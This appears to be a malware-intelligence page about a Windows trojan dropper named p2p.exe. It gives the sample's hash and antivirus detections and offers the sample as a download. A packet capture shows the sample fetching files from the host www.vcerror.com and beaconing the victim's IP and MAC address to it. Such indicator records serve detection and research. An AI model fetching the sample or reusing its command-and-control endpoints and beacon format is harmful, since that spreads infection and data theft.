Download Attachments
-
1
p2p
Date added: October 26, 2016 5:32 am
Added by: admin
File size: 25 KB
Downloads: 239
SHA256: |
ef794b9a3b72ae5524e17ecccf330eb16f2cc74f3e7fe7cb2667acefdea4b3a3 |
File name: |
p2p.exe |
Detection ratio: |
47 / 55 |
Analysis date: |
2016-10-26 21:33:06 UTC ( 0 minutes ago ) |
AVG |
Generic37.DEP |
20161026 |
AVware |
Trojan.Win32.Generic!BT |
20161026 |
Ad-Aware |
Gen:Trojan.Heur.fmKfXCDIycnj |
20161026 |
AegisLab |
Troj.Dropper.W32.Injector!c |
20161026 |
AhnLab-V3 |
Malware/Win32.Generic.N1843405561 |
20161026 |
Antiy-AVL |
Trojan[Dropper]/Win32.Injector |
20161026 |
Arcabit |
Trojan.Heur.fmKfXCDIycnj |
20161026 |
Avast |
Win32:Rofin-A [Trj] |
20161026 |
Avira (no cloud) |
TR/Crypt.FKM.Gen |
20161026 |
2016-10-25 23:20:18.175277 IP 192.168.1.102.61056 > 123.57.11.22.80: Flags [P.], seq 0:292, ack 1, win 256, length 292: HTTP: GET /YW/p2p/p2p.exe HTTP/1.1
E..L..@…._…f{9…..PZ.VX….P…….GET /YW/p2p/p2p.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.vcerror.com
Connection: Keep-Alive
2016-10-25 23:20:18.419780 IP 192.168.1.102.61056 > 123.57.11.22.80: Flags [.], ack 2921, win 256, length 0
E..(..@……..f{9…..PZ.W|..%uP….V……..
—
E..(..@….a…f{9…..PD.=…+.P…C………
2016-10-25 23:20:26.821311 IP 192.168.1.102.61057 > 123.57.11.22.80: Flags [P.], seq 0:103, ack 1, win 256, length 103: HTTP: GET /YW/p2p/ver.dat HTTP/1.1
E…..@……..f{9…..PD.=…+.P…Q…GET /YW/p2p/ver.dat HTTP/1.1
User-Agent: TestIE/1.0
Host: www.vcerror.com
Connection: Keep-Alive
2016-10-25 23:20:26.823460 IP 192.168.1.102.61058 > 13.107.21.200.443: Flags [.], ack 6157, win 32754, length 0
E..(s.@……..f.k……….kx.SP………….
2016-10-25 23:20:26.853146 IP 192.168.1.102.61058 > 13.107.21.200.443: Flags [.], ack 6754, win 32680, length 0
E..(s.@……..f.k……….kx..P………….
2016-10-25 23:20:27.116031 IP 192.168.1.102.61057 > 123.57.11.22.80: Flags [.], ack 318, win 255, length 0
—
E..(..@….]…f{9…..P….,…P…D;……..
2016-10-25 23:20:27.513843 IP 192.168.1.102.61059 > 123.57.11.22.80: Flags [P.], seq 0:304, ack 1, win 256, length 304: HTTP: GET /YW/config/config.bin?ver=3.180&lip=192.168.32.132&mac=000C29184A91 HTTP/1.1
E..X..@….,…f{9…..P….,…P…….GET /YW/config/config.bin?ver=3.180&lip=192.168.32.132&mac=000C29184A91 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: www.vcerror.com
Connection: Close
Cache-Control: no-cache
2016-10-25 23:20:27.850658 IP 192.168.1.102.61059 > 123.57.11.22.80: Flags [.], ack 1297, win 251, length 0
—
E..(..@….V…f{9…..P.~.k…[P….A……..
2016-10-25 23:20:30.265197 IP 192.168.1.102.61060 > 123.57.11.22.80: Flags [P.], seq 0:364, ack 1, win 256, length 364: HTTP: GET /YW/txt/hello.txt?ver=3.180&uid=config&lip=192.168.32.132&mac=000C29184A91&p=0&b=0.0.0.0.0&md5=64663066353033343933653362333835 HTTP/1.1
E…..@……..f{9…..P.~.k…[P…….GET /YW/txt/hello.txt?ver=3.180&uid=config&lip=192.168.32.132&mac=000C29184A91&p=0&b=0.0.0.0.0&md5=64663066353033343933653362333835 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: www.vcerror.com
Connection: Close
Cache-Control: no-cache
Please follow and like us: